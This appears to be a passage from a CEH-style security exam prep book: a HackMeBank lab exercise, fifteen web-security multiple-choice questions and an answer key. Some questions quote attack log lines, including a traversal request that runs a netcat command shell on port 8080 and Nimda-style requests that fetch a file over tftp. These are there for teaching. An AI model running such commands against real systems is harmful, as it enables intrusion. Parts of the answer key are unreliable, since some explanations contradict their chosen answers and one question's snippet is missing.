Database Overview

Apply Your Knowledge

Web and databases security are an important part of the overall security of the organization. During a penetration test, it's something that you can expect to be asked to review.

Exercises

Sidebar 8 1 Hack the Bank

Okay, now that the title of this exercise has your attention, let's discuss the exercise. In this exercise, you will examine the Foundstone HackMeBank SQL portal. You will need to have MSSQL and IIS loaded on a Windows XP system to complete the exercise.

Estimated Time: 1 hour.

  1. HackMeBank is designed to teach ethical hackers how to create secure software and spot vulnerabilities. HackMeBank simulates a real-world online banking application, which was built with a number of known and common vulnerabilities such as SQL injection and cross-site scripting. This allows users to attempt real exploits against a web application and thus learn the specifics of the issue and how best to fix it.

  2. Download the HackMeBank software from www.foundstone.com/index.htm?subnav=resources/navigation.htm&subcontent=/resources/proddesc/hacmebank.htm. You will also want to copy the user and solution guide found on the same page.

  3. Once installed, double-click the HackMeBank setup file and accept the defaults.

  4. Notice the install message and follow the commands to activate asp.net.

  5. When installed, you can launch the application from the Start program's menu. Make sure to open the user and solution guide PDF to get started on the project.

Exam Prep Questions

1.

You have noticed the following in your logs. What was the attacker trying to do?

 

[View full width]

GET/%c0%af..%c0%af..%c0%af..%c0%af..C:/mydocuments/home/cmd.exe? /c+nc+-l+-p+8080+-e+cmd .exe HTTP/1.1  

A. Replace the original cmd.exe with a Trojaned one.

B. Exploit the Double Decode vulnerability.

C. Spawn a reverse shell and execute xterm.

D. Install Netcat as a listener on port 8080 to shovel a command shell back to the attacker.
2.

Which of the following best describes HTTP?

A. HTTP is based on UDP.

B. HTTP is considered a stateful connection.

C. HTTP is based on ICMP.

D. HTTP is considered a stateless connection.
   
3.

When discussing passwords, what is considered a brute force attack?

A. You load a dictionary of words into your cracking program.

B. You create a rainbow table from a dictionary and compare it with the encrypted passwords.

C. You attempt every single possibility until you exhaust all possible combinations or discover the password.

D. You threaten to use a rubber hose on someone unless they reveal their password.
4.

What does the following command achieve?

Telnet HEAD /HTTP/1.0  

A. This command opens a backdoor Telnet session to the IP address specified.

B. This command starts a Netcat listener.

C. This command redirects Telnet to return the banner of the website specified by the URL.

D. This command returns the banner of the website specified by IP address.
5.

You found the following address in your log files: 0xde.0xaa.0xce.0x1a. What is the IP address in decimal?

A. 222.170.206.26

B. 16.216.170.131

C. 202.170.216.16

D. 131.410.10.11
6.

What form of authentication takes a username and a random nonce and combines them?

A. Message digest authentication

B. Password authentication protocol

C. Certificate-based authentication

D. Forms-based authentication
   
7.

While performing a penetration test for your client, you discovered the following on their e-commerce website:

   

Which of the following should you note in your report?

A. Value should list item number and not item name.

B. Dollar value should be confirmed before processing it.

C. Pid value is invalid.

D. Width of hidden filed should be expanded.
8.

Which of the following is a best defense against the Unicode vulnerability on an unpatched IIS server?

A. Install the web server to a separate logical drive other than that of the OS

B. Make a copy of cmd.exe and move to the c:/Winnt folder

C. Uninstall or disable the TFTP server on the Windows server

D. Rename cmd.exe to something else
9.

While conducting a penetration test for a new client, you noticed that they had several databases. After testing one, you got the following response:

Microsoft OLE DB Provider for ODBC Drivers error '80004005' [Microsoft][ODBC Driver Manager] Data source name not found and no default driver specified error in asp file line 82:  

What is the problem?

A. The Oracle database is vulnerable to SQL injection.

B. This is a double-free vulnerability for MySQL version 8.00.4.

C. The SQL server is vulnerable to cross-site scripting.

D. The SQL server is vulnerable to SQL injection.
   
10.

You have been asked to investigate a breach of security. An attacker has been successful at modifying the purchase price of an item. You have verified that no entries were found in the IDS, and the SQL databases show no indication of compromise. How did this attack most likely occur?

A. The attack occurred by gaining the help of an insider. The lack of any IDS entries clearly identifies this solution.

B. The attack occurred by changing the hidden tag value from a local copy of the web page.

C. The attack occurred by launching a cross-site scripting attack.

D. The attack occurred by using SQL injection techniques.
11.

What form of authentication is characterized by its use of cleartext?

A. Message digest authentication

B. Password authentication protocol

C. Certificate-based authentication

D. Forms-based authentication
12.

You have found the following address in your logs and are unsure of its origins. You tried to ping the address ping 2605306123, and it even came back as a valid address. What is the corresponding real IP?

A. 78.106.61.46

B. 155.73.209.11

C. 209.17.32.91

D. 117.30.12.221
13.

Which of the following will let you assume a user's identity at a dynamically generated web page or site?

A. Buffer overflow attack

B. Cross-site scripting

C. SQL attack

D. File system traversal
   
14.

Your web logs reveal the following:

GET /c/winnt/system32/cmd.exe?/c+dir GET /_vti_bin/..%5c../..%5c../..%5c../winnt/system32/cmd.exe?/c+dir GET /_mem_bin/..%5c../..%5c../..%5c../winnt/system32/cmd.exe?/c+dir GET /scripts/..xc1x1c../winnt/system32/cmd.exe?/c+dir GET /scripts/..xc0/../winnt/system32/cmd.exe?/c+dir GET /scripts/..xc0xaf../winnt/system32/cmd.exe?/c+dir GET /scripts/..xc1x9c../winnt/system32/cmd.exe?/c+dir GET /scripts/..%35c../winnt/system32/cmd.exe?/c+dir GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+tftp%20-i%20GET%20admin.dll%20c:admin.dll  

What does this mean?

A. The Morris worm

B. The Blaster worm

C. The Nimda worm

D. A double decode attack
15.

Which of the following tools is used for web-based password cracking?

A. ObiWan

B. SQLSmack

C. Wikto

D. N-Stealth

Answers to Exam Questions

A1:

1. D. The purpose of the entry was an attempt to install Netcat as a listener on port 8080 to shovel a command shell back to the attacker. Answers A, B, and C are incorrect. The attack is not attempting to replace cmd.exe, it is not exploiting double decode, and it is not attempting to execute the Linux xterm command.
A2:

2. D. Although HTTP uses TCP as a transport, it is considered a stateless connection because the TCP session does not stay open waiting for multiple requests and their responses. Answer A is incorrect, as HTTP is not based on UDP; it is TCP based. Answer B is incorrect because HTTP is considered stateless. Answer C is incorrect because HTTP is not based on ICMP.
A3:

3. C. A brute force attack attempts every single possibility until you exhaust all possible combinations of words and characters or discover the password. Answer A is incorrect, as it describes a dictionary attack. Answer B is incorrect, as using a rainbow table created from a dictionary is not an example of a brute force attack. Answer D is incorrect because threatening someone with bodily harm is not a brute force attack.
   
A4:

4. D. This command returns the banner of the website specified by IP address. Answers A, B, and C are incorrect because this command does not open a backdoor Telnet session on the client, it does not start a Netcat listener, and it does not return a banner from a URL, as an IP address is specified in the command.
A5:

5. A. 0xde.0xaa.0xce.0x1a hexadecimal converted to base10 gives 222.170.206.26. Answers B, C, and D are therefore incorrect.
A6:

6. A. It uses the username, the password, and a nonce value to create an encrypted value that is passed to the server. Answer B is incorrect, as password authentication protocol (PAP) sends information in cleartext. Answer C is incorrect because Certification authentication uses the PKI infrastructure. Answer D is incorrect, as forms-based authentication is based on the use of a cookie.
A7:

7. B. When attackers discover the hidden price field, they might attempt to alter it and reduce the price. To avoid this problem, hidden price fields should not be used. However, if they are used, the value should be confirmed before processing. Answer A is incorrect because value name field will not affect the fact that someone might attempt to lower the price of the item. Answer C is incorrect, as again, the PID has no effect on this price altering possibility. Answer D is incorrect because the hidden field should not be expanded. If attackers can change the hidden field to a larger value and submit a long string, there is a possibility that they can crash the server.
A8:

8. A. File traversal will not work from one logical drive to another; therefore, the attack would be unsuccessful. Answer B would not prevent an attacker from exploiting the Unicode vulnerability. Answer C is incorrect, as no TFTP server is required on the IIS system for the attack to be successful. Answer D is a possibility, and renaming the file would slow down the attacker; however, there is still the chance that he might guess what it has been renamed. Security by obscurity should never be seen as a real defense.
A9:

9. D. SQL injection is a type of exploit whereby hackers are able to execute SQL statements via an Internet browser. You can test for it using logic, such as 1=1, or inserting a single '. Answer A is incorrect because this is not an Oracle database. Answer B is incorrect, as it is not a MySQL database. Answer C is incorrect, as 80004005 indicates a potential for SQL injection.
A10:

10. B. Changing the hidden tag value from a local copy of the web page would allow an attacker to alter the prices without tampering with the SQL database or any alerts being raised on the IDS. Therefore, answers A, C, and D are incorrect.
A11:

11. B. Password authentication protocol (PAP) allows the client to authenticate itself by sending a username and password to the server in cleartext. The technique is vulnerable to sniffers who might try obtaining the password by sniffing the network connection. Answer A is incorrect, as message digest is secured by using hashing algorithms such as MD5 in combination with a random nonce. Answer C is incorrect because certificate authentication uses PKI. Answer D is incorrect because forms authentication can use a cookie to store the encrypted password.
   
A12:

12. B. Converting 2605306123 base10 to octet reveals 203.2.4.5. For example, to convert the number 155.73.209.11 to base 10, first convert to binary 10011011010010011101000100001011, and then divide into four bytes:

10011011 = 155

01001001 = 73

11010001 = 209

00001011 = 11

Then, convert each back to decimal, 155.73.209.11. Therefore, answers A, C, and D are incorrect.
A13:

13. B. Cross site scripting (XSS) lets you assume a user's identity at a dynamically generated web page or site by exploiting the stateless architecture of the Internet. It works by performing cookie theft. The attacker tricks the victim into passing him the cookie through XSS. After the attacker gains the cookie, he sends the cookie to the web server and spoofs the identity of the victim. To get the cookie using a script attack, the attacker needs to craft a special form, which posts back the value of document cookie to his site. Answer A is incorrect because the question does not define a buffer overflow attack. Answer C is incorrect because the question does not define a SQL attack, and. Answer D is not a possibility. File traversal attacks occur when the attacker can move from one directory to another with valid permissions.
A14:

14. C. The Nimda worm modifies all web content files it finds and bases its attack on the same vulnerability that is seen in the Unicode vulnerability. Answers A, B, and D are incorrect because the log entry does not indicate the Morris worm, blaster, or a double decode attack. Identifying admin.dll is one way to identify this as a Nimda attack.
A15:

15. A. ObiWan is used for password cracking. Answers B, C, and D are incorrect because SQLSmack is a Linux SQL hacking tool, Wikto is a web assessment tool, and N-Stealth is a web vulnerability tool. Knowing which tools are used in each step of the web hacking methodology is an important goal of the CEH exam. You should spend a portion of your time preparing for the test practicing with the tools and learning to understand their output.

Suggested Reading and Resources

http://www.e-commercealert.com/article264.htmlHidden fields

http://www.intellicatalog.com/HiddenFieldFraud.cfmHidden field fraud

http://eyeonsecurity.org/papers/passport.htmMicrosoft Passport authentication

www.process.com/techsupport/spamtricks.htmlHiding URLs

www.governmentsecurity.org/articles/SQLInjectionModesofAttackDefenceandWhyItMatters.phpSQL attacks

www.cgisecurity.com/articles/xss-faq.shtmlXSS attacks and methods

www.nai.com/us/security/resources/sv_ent01.htmUnicode attacks

Wireless Technologies, Security, and Attacks
Related

Категории